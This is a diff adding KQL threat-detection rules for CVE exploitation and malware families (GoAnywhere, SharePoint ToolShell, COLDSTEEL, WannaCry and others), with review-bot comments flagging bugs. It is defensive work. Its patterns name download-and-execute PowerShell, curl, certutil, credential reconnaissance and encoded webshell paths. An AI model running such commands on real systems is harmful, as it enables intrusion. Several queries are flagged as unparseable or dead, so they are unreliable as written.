@@ -0,0 +1,14 @@ +// Title: Potential Exploitation of GoAnywhere MFT Vulnerability +// Author: MSFT (idea), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-10-07 +// Level: high +// Description: Detects suspicious command execution by child processes of the GoAnywhere Managed File Transfer (MFT) application, which may indicate exploitation such as CVE-2025-10035. +This behavior is indicative of post-exploitation activity related to CVE-2025-10035, as observed in campaigns by the threat actor Storm-1175. + +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1059.001, attack.persistence, attack.t1133, detection.emerging-threats, cve.2025-10035 +// False Positives: +// - Legitimate administrative scripts or built-in GoAnywhere functions could potentially trigger this rule. Tuning may be required based on normal activity in your environment. + +DeviceProcessEvents +| where InitiatingProcessFolderPath contains "\\GoAnywhere\\tomcat\\" and ((((ProcessCommandLine contains "IEX" and ProcessCommandLine contains "enc" and ProcessCommandLine contains "Hidden" and ProcessCommandLine contains "bypass") or (ProcessCommandLine matches regex "net\\s+user" or ProcessCommandLine matches regex "net\\s+group" or ProcessCommandLine matches regex "query\\s+session") or (ProcessCommandLine contains "whoami" or ProcessCommandLine contains "systeminfo" or ProcessCommandLine contains "dsquery" or ProcessCommandLine contains "localgroup administrators" or ProcessCommandLine contains "nltest" or ProcessCommandLine contains "samaccountname=" or ProcessCommandLine contains "adscredentials" or ProcessCommandLine contains "o365accountconfiguration" or ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "FromBase64String(" or ProcessCommandLine contains "System.IO.Compression" or ProcessCommandLine contains "System.IO.MemoryStream" or ProcessCommandLine 
contains "curl")) and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe")) or (((ProcessCommandLine contains "powershell" or ProcessCommandLine contains "whoami" or ProcessCommandLine contains "net.exe" or ProcessCommandLine contains "net1.exe" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "quser" or ProcessCommandLine contains "nltest" or ProcessCommandLine contains "curl") and FolderPath endswith "\\cmd.exe") or (ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wscript"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql b/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql new file mode 100644 index 00000000..cb67a2eb --- /dev/null +++ b/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql 
@@ -0,0 +1,12 @@
+// Title: Potential SharePoint ToolShell CVE-2025-53770 Exploitation - File Create
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-07-21
+// Level: critical
+// Description: Detects the creation of file such as spinstall0.aspx which may indicate successful exploitation of CVE-2025-53770.
+CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution.
+
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, cve.2025-53770, detection.emerging-threats
+
+DeviceFileEvents
+| where (FolderPath contains "\\15\\TEMPLATE\\LAYOUTS\\" or FolderPath contains "\\16\\TEMPLATE\\LAYOUTS\\") and (FolderPath endswith "\\spinstall.aspx" or (FolderPath contains "\\spinstall" and FolderPath contains ".aspx") or FolderPath endswith "\\debug_dev.js") and (FolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\" or FolderPath startswith "C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Web Server Extensions\\")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql b/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql
new file mode 100644
index 00000000..7be0e5cc
--- /dev/null
+++ b/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql
@@ -0,0 +1,12 @@ +// Title: Potential SharePoint ToolShell CVE-2025-53770 Exploitation Indicators +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-07-21 +// Level: high +// Description: Detects potential exploitation of CVE-2025-53770 by identifying indicators such as suspicious command lines discovered in Post-Exploitation activities. +CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution. + +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, cve.2025-53770, detection.emerging-threats + +DeviceProcessEvents +| where (InitiatingProcessFolderPath endswith "\\w3wp.exe" and ((ProcessCommandLine contains "cwBwAGkAbgBzAHQAYQBsAGwAMAAuAGEAcwBwAHgA" or ProcessCommandLine contains "MAcABpAG4AcwB0AGEAbABsADAALgBhAHMAcAB4A" or ProcessCommandLine contains "zAHAAaQBuAHMAdABhAGwAbAAwAC4AYQBzAHAAeA" or ProcessCommandLine contains "c3BpbnN0YWxsMC5hc3B4") or (ProcessCommandLine contains "OgBcAFAAUgBPAEcAUgBBAH4AMQBcAEMATwBNAE0ATwBOAH4AMQBcAE0ASQBDAFIATwBTAH4AMQBcAFcARQBCAFMARQBSAH4AMQBcADEANQBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMA" or ProcessCommandLine contains "oAXABQAFIATwBHAFIAQQB+ADEAXABDAE8ATQBNAE8ATgB+ADEAXABNAEkAQwBSAE8AUwB+ADEAXABXAEUAQgBTAEUAUgB+ADEAXAAxADUAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTA" or ProcessCommandLine contains "6AFwAUABSAE8ARwBSAEEAfgAxAFwAQwBPAE0ATQBPAE4AfgAxAFwATQBJAEMAUgBPAFMAfgAxAFwAVwBFAEIAUwBFAFIAfgAxAFwAMQA1AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUw" or ProcessCommandLine contains "OgBcAFAAUgBPAEcAUgBBAH4AMQBcAEMATwBNAE0ATwBOAH4AMQBcAE0ASQBDAFIATwBTAH4AMQBcAFcARQBCAFMARQBSAH4AMQBcADEANgBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMA" or ProcessCommandLine contains "oAXABQAFIATwBHAFIAQQB+ADEAXABDAE8ATQBNAE8ATgB+ADEAXABNAEkAQwBSAE8AUwB+ADEAXABXAEUAQgBTAEUAUgB+ADEAXAAxADYAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTA" or ProcessCommandLine contains 
"6AFwAUABSAE8ARwBSAEEAfgAxAFwAQwBPAE0ATQBPAE4AfgAxAFwATQBJAEMAUgBPAFMAfgAxAFwAVwBFAEIAUwBFAFIAfgAxAFwAMQA2AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUw" or ProcessCommandLine contains "OgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABDAG8AbQBtAG8AbgAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0ACAAUwBoAGEAcgBlAGQAXABXAGUAYgAgAFMAZQByAHYAZQByACAARQB4AHQAZQBuAHMAaQBvAG4AcwBcADEANQBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMA" or ProcessCommandLine contains "oAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwAQwBvAG0AbQBvAG4AIABGAGkAbABlAHMAXABNAGkAYwByAG8AcwBvAGYAdAAgAFMAaABhAHIAZQBkAFwAVwBlAGIAIABTAGUAcgB2AGUAcgAgAEUAeAB0AGUAbgBzAGkAbwBuAHMAXAAxADUAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTA" or ProcessCommandLine contains "6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEMAbwBtAG0AbwBuACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAIABTAGgAYQByAGUAZABcAFcAZQBiACAAUwBlAHIAdgBlAHIAIABFAHgAdABlAG4AcwBpAG8AbgBzAFwAMQA1AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUw" or ProcessCommandLine contains "OgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABDAG8AbQBtAG8AbgAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0ACAAUwBoAGEAcgBlAGQAXABXAGUAYgAgAFMAZQByAHYAZQByACAARQB4AHQAZQBuAHMAaQBvAG4AcwBcADEANgBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMA" or ProcessCommandLine contains "oAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwAQwBvAG0AbQBvAG4AIABGAGkAbABlAHMAXABNAGkAYwByAG8AcwBvAGYAdAAgAFMAaABhAHIAZQBkAFwAVwBlAGIAIABTAGUAcgB2AGUAcgAgAEUAeAB0AGUAbgBzAGkAbwBuAHMAXAAxADYAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTA" or ProcessCommandLine contains "6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEMAbwBtAG0AbwBuACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAIABTAGgAYQByAGUAZABcAFcAZQBiACAAUwBlAHIAdgBlAHIAIABFAHgAdABlAG4AcwBpAG8AbgBzAFwAMQA2AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUw"))) or (ProcessCommandLine contains "-EncodedCommand JABiAGEAcwBlADYANABTAHQAcgBpAG4AZwAgAD0" or ProcessCommandLine contains "TEMPLATE\\LAYOUTS\\spinstall0.aspx") \ No newline at end of file 
diff --git a/KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql b/KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql
new file mode 100644
index 00000000..3d5f9f76
--- /dev/null
+++ b/KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql
@@ -0,0 +1,16 @@
+// Title: Suspicious CrushFTP Child Process
+// Author: Craig Sweeney, Matt Anderson, Jose Oregon, Tim Kasper, Faith Stratton, Samantha Shaw, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-04-10
+// Level: medium
+// Description: Detects suspicious child processes spawned by the CrushFTP service that may indicate exploitation of remote code execution vulnerabilities such as
+CVE-2025-31161, where attackers can achieve RCE through crafted HTTP requests.
+The detection focuses on commonly abused Windows executables (like powershell.exe, cmd.exe etc.) that attackers typically use post-exploitation to execute malicious commands.
+
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1190, cve.2025-31161, detection.emerging-threats
+// False Positives:
+// - Legitimate CrushFTP administrative actions
+// - Software updates
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\crushftpservice.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Lateral Movement/wannacry_ransomware_activity.kql b/KQL/rules-emerging-threats/Lateral Movement/wannacry_ransomware_activity.kql
new file mode 100644
index 00000000..fed91862
--- /dev/null
+++ b/KQL/rules-emerging-threats/Lateral Movement/wannacry_ransomware_activity.kql
@@ -0,0 +1,10 @@
+// Title: WannaCry Ransomware Activity
+// Author: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro
+// Date: 2019-01-16
+// Level: critical
+// Description: Detects WannaCry ransomware activity
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1210, attack.discovery, attack.t1083, attack.defense-evasion, attack.t1222.001, attack.impact, attack.t1486, attack.t1490, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "@Please_Read_Me@.txt" or ((FolderPath endswith "\\tasksche.exe" or FolderPath endswith "\\mssecsvc.exe" or FolderPath endswith "\\taskdl.exe" or FolderPath endswith "\\taskhsvc.exe" or FolderPath endswith "\\taskse.exe" or FolderPath endswith "\\111.exe" or FolderPath endswith "\\lhdfrgui.exe" or FolderPath endswith "\\linuxnew.exe" or FolderPath endswith "\\wannacry.exe") or FolderPath contains "WanaDecryptor")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql b/KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql
new file mode 100644
index 00000000..d7a03f6f
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql
@@ -0,0 +1,13 @@
+// Title: Blackbyte Ransomware Registry
+// Author: frack113
+// Date: 2022-01-24
+// Level: high
+// Description: Detects specific windows registry modifications made by BlackByte ransomware variants.
+BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption.
+This rule triggers when any of the following registry keys are set to DWORD 1, however all three should be investigated as part of a larger BlackByte ransomware detection and response effort.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112, detection.emerging-threats
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey in~ ("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLinkedConnections", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Control\\FileSystem\\LongPathsEnabled"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/blue_mockingbird.kql b/KQL/rules-emerging-threats/Persistence/blue_mockingbird.kql
new file mode 100644
index 00000000..b5e28149
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/blue_mockingbird.kql
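Review bot: `RegistryValueData =~ "DWORD (0x00000001)"` in the BlackByte hunk is the Sysmon `Details` rendering of a DWORD; DeviceRegistryEvents carries the type in `RegistryValueType` and the data as a plain string, so this condition should never be true on MDE data and the rule is effectively dead. The three strings in the `RegistryKey in~ (...)` list also end in value names (LocalAccountTokenFilterPolicy, EnableLinkedConnections, LongPathsEnabled) rather than keys, and in this schema the value name lives in `RegistryValueName`, so that half of the condition needs the same split; a closer equivalent would start `| where RegistryValueType =~ "Dword" and RegistryValueData == "1"` and then match `RegistryKey` against the parent paths and `RegistryValueName` against the three names, confirmed against a live event. Separately, `SYSTEM\\CurrentControlSet001\\Control\\FileSystem\\LongPathsEnabled` is neither `CurrentControlSet` nor `ControlSet001`, so that entry cannot match even after the schema fix; it looks inherited from the upstream rule and is worth correcting there too.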
@@ -0,0 +1,10 @@
+// Title: Blue Mockingbird
+// Author: Trent Liffick (@tliffick)
+// Date: 2020-05-14
+// Level: high
+// Description: Attempts to detect system changes made by Blue Mockingbird
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.execution, attack.t1112, attack.t1047, detection.emerging-threats
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "sc config" and ProcessCommandLine contains "wercplsupporte.dll") and FolderPath endswith "\\cmd.exe") or (ProcessCommandLine endswith "COR_PROFILER" and FolderPath endswith "\\wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/coldsteel_rat_anonymous_user_process_execution.kql b/KQL/rules-emerging-threats/Persistence/coldsteel_rat_anonymous_user_process_execution.kql
new file mode 100644
index 00000000..92ec323a
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/coldsteel_rat_anonymous_user_process_execution.kql
@@ -0,0 +1,10 @@
+// Title: COLDSTEEL RAT Anonymous User Process Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-30
+// Level: high
+// Description: Detects the creation of a process executing as user called "ANONYMOUS" seen used by the "MileStone2016" variant of COLDSTEEL
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath contains "\\Windows\\System32\\" or InitiatingProcessFolderPath contains "\\AppData\\") and AccountName contains "ANONYMOUS"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/coldsteel_rat_cleanup_command_execution.kql b/KQL/rules-emerging-threats/Persistence/coldsteel_rat_cleanup_command_execution.kql
new file mode 100644
index 00000000..97427716
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/coldsteel_rat_cleanup_command_execution.kql
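Review bot: `AccountName contains "ANONYMOUS"` in the COLDSTEEL anonymous-user hunk also matches the built-in `ANONYMOUS LOGON` account, which can legitimately appear as the account of a process on domain members, so at level high the rule is likely to be noisier than the narrow MileStone2016 case the description targets. If the intent is a user literally named ANONYMOUS, `AccountName =~ "ANONYMOUS"` is the tighter form; if the looser match is deliberate, a `// False Positives:` entry naming `ANONYMOUS LOGON` would tell the analyst what to expect. The parent-path constraint (`\\Windows\\System32\\` or `\\AppData\\`) is broad enough that it does not offset this on its own.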
@@ -0,0 +1,12 @@
+// Title: COLDSTEEL RAT Cleanup Command Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-30
+// Level: critical
+// Description: Detects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "UpdateDriverForPlugAndPlayDevicesW" or ProcessCommandLine contains "ServiceMain" or ProcessCommandLine contains "DiUninstallDevice") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessCommandLine contains " -k msupdate" or InitiatingProcessCommandLine contains " -k msupdate2" or InitiatingProcessCommandLine contains " -k alg") and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/coldsteel_rat_service_persistence_execution.kql b/KQL/rules-emerging-threats/Persistence/coldsteel_rat_service_persistence_execution.kql
new file mode 100644
index 00000000..f4bd0418
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/coldsteel_rat_service_persistence_execution.kql
@@ -0,0 +1,12 @@
+// Title: COLDSTEEL RAT Service Persistence Execution
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-04-30
+// Level: critical
+// Description: Detects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith " -k msupdate" or ProcessCommandLine endswith " -k msupdate2" or ProcessCommandLine endswith " -k alg") and FolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql b/KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql
new file mode 100644
index 00000000..408b84d2
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql
@@ -0,0 +1,12 @@
+// Title: Commvault QOperation Path Traversal Webshell Drop (CVE-2025-57790)
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-20
+// Level: high
+// Description: Detects the use of qoperation.exe with the -file argument to write a JSP file to the webroot, indicating a webshell drop.
+This is a post-authentication step corresponding to CVE-2025-57790.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003, detection.emerging-threats, cve.2025-57790
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "qoperation" and ProcessCommandLine contains "exec" and ProcessCommandLine contains " -af " and ProcessCommandLine contains ".xml " and ProcessCommandLine contains "\\Apache\\webapps\\ROOT\\" and ProcessCommandLine contains ".jsp"
\ No newline at end of file
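Review bot: The description continuation line `This is a post-authentication step corresponding to CVE-2025-57790.` in the Commvault hunk is emitted without the `//` prefix, so it lands in the .kql file as a bare statement and the query will not parse. The converter should prefix every line of a multi-line Sigma description with `// `, giving `// This is a post-authentication step corresponding to CVE-2025-57790.` here. The same defect appears in the CVE-2020-1048 registry, Kapeka, KamiKakaBot, Notepad++ CVE-2025-49144, Raspberry Robin ZoneMap and ScreenConnect User Database hunks below.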
diff --git a/KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql b/KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql
new file mode 100644
index 00000000..08a8e4cc
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql
@@ -0,0 +1,14 @@
+// Title: CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry
+// Author: EagleEye Team, Florian Roth (Nextron Systems), NVISO
+// Date: 2020-05-13
+// Level: high
+// Description: Detects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension.
+This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.t1112, cve.2020-1048, detection.emerging-threats
+// False Positives:
+// - New printer port install on host
+
+DeviceRegistryEvents
+| where (RegistryValueData contains ".bat" or RegistryValueData contains ".com" or RegistryValueData contains ".dll" or RegistryValueData contains ".exe" or RegistryValueData contains ".ps1" or RegistryValueData contains ".vbe" or RegistryValueData contains ".vbs" or RegistryValueData contains "C:") and RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Ports"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql b/KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql
new file mode 100644
index 00000000..59ae319c
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql
@@ -0,0 +1,13 @@
+// Title: CVE-2024-1708 - ScreenConnect Path Traversal Exploitation
+// Author: Matt Anderson, Andrew Schwartz, Caleb Stewart, Huntress
+// Date: 2024-02-21
+// Level: medium
+// Description: This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, cve.2024-1708, detection.emerging-threats
+// False Positives:
+// - This will occur legitimately as well and will result in some benign activity.
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\ScreenConnect.Service.exe" and ((FolderPath contains "ScreenConnect\\App_Extensions\\" and FolderPath contains ".ashx") or (FolderPath contains "ScreenConnect\\App_Extensions\\" and FolderPath contains ".aspx"))) and (not(FolderPath =~ "*ScreenConnect\\App_Extensions\*\*"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/darkgate_user_created_via_net_exe.kql b/KQL/rules-emerging-threats/Persistence/darkgate_user_created_via_net_exe.kql
new file mode 100644
index 00000000..e8f35600
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/darkgate_user_created_via_net_exe.kql
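Review bot: The exclusion `not(FolderPath =~ "*ScreenConnect\\App_Extensions\*\*")` in the `| where` line of the ScreenConnect hunk keeps Sigma's `*` wildcards as literal characters: `=~` is case-insensitive equality with no glob support, and `\*` is not a valid escape in a KQL string literal, so the filter is at best a no-op and at worst a parse error. The intent appears to be "not inside a sub-directory of App_Extensions", which needs a real expression, for example a `matches regex` on `FolderPath` or a test for a further `\\` after `App_Extensions\\`. The same literal-`*` problem is in the `endswith "...*"` terms of the OceanLotus, Outlook Task/Note Reminder, SNAKE Encrypted Registry Blob, Raspberry Robin ZoneMap and Small Sieve hunks below; an `endswith` whose pattern ends in `*` can never match a real key and should become `contains` on the prefix.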
@@ -0,0 +1,12 @@
+// Title: DarkGate - User Created Via Net.EXE
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-08-27
+// Level: high
+// Description: Detects creation of local users via the net.exe command with the name of "DarkGate"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1136.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "user" and ProcessCommandLine contains "add" and ProcessCommandLine contains "DarkGate" and ProcessCommandLine contains "SafeMode") and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/exploiting_setupcomplete_cmd_cve_2019_1378.kql b/KQL/rules-emerging-threats/Persistence/exploiting_setupcomplete_cmd_cve_2019_1378.kql
new file mode 100644
index 00000000..3b05056b
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/exploiting_setupcomplete_cmd_cve_2019_1378.kql
@@ -0,0 +1,10 @@
+// Title: Exploiting SetupComplete.cmd CVE-2019-1378
+// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
+// Date: 2019-11-15
+// Level: high
+// Description: Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1068, attack.execution, attack.t1059.003, attack.t1574, cve.2019-1378, detection.emerging-threats
+
+DeviceProcessEvents
+| where ((InitiatingProcessCommandLine contains "\\cmd.exe" and InitiatingProcessCommandLine contains "/c" and InitiatingProcessCommandLine contains "C:\\Windows\\Setup\\Scripts\\") and (InitiatingProcessCommandLine endswith "SetupComplete.cmd" or InitiatingProcessCommandLine endswith "PartnerSetupComplete.cmd")) and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\" or FolderPath startswith "C:\\Windows\\Setup\\")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql b/KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql
new file mode 100644
index 00000000..39e87097
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql
@@ -0,0 +1,12 @@
+// Title: Kapeka Backdoor Configuration Persistence
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-07-03
+// Level: medium
+// Description: Detects registry set activity of a value called "Seed" stored in the "\Cryptography\Providers\" registry key.
+The Kapeka backdoor leverages this location to register a new SIP provider for backdoor configuration persistence.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1553.003, detection.emerging-threats
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\Providers\\{" and RegistryKey endswith "\\Seed") and (not(RegistryValueData contains "(Empty)"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/moriya_rootkit_file_created.kql b/KQL/rules-emerging-threats/Persistence/moriya_rootkit_file_created.kql
new file mode 100644
index 00000000..d4cf62d1
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/moriya_rootkit_file_created.kql
@@ -0,0 +1,10 @@
+// Title: Moriya Rootkit File Created
+// Author: Bhabesh Raj
+// Date: 2021-05-06
+// Level: critical
+// Description: Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath =~ "C:\\Windows\\System32\\drivers\\MoriyaStreamWatchmen.sys"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/oceanlotus_registry_activity.kql b/KQL/rules-emerging-threats/Persistence/oceanlotus_registry_activity.kql
new file mode 100644
index 00000000..c645af9b
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/oceanlotus_registry_activity.kql
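Review bot: The Moriya `| where` line matches every `DeviceFileEvents` row for that path, although the title and description say the rule detects file creation; without an `ActionType` constraint, a rename, modification or deletion of the same path alerts identically, and none of the file rules on this page constrain the action. Add `and ActionType == "FileCreated"` here, and the matching `and ActionType == "FileDeleted"` to the PrintNightmare hunk further down, whose description says "DLL deletions" but whose query fires on any spoolsv.exe file event in the driver folder, including the ordinary driver installs that populate it.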
@@ -0,0 +1,10 @@
+// Title: OceanLotus Registry Activity
+// Author: megan201296, Jonhnathan Ribeiro
+// Date: 2019-04-14
+// Level: critical
+// Description: Detects registry keys created in OceanLotus (also known as APT32) attacks
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112, detection.emerging-threats
+
+DeviceRegistryEvents
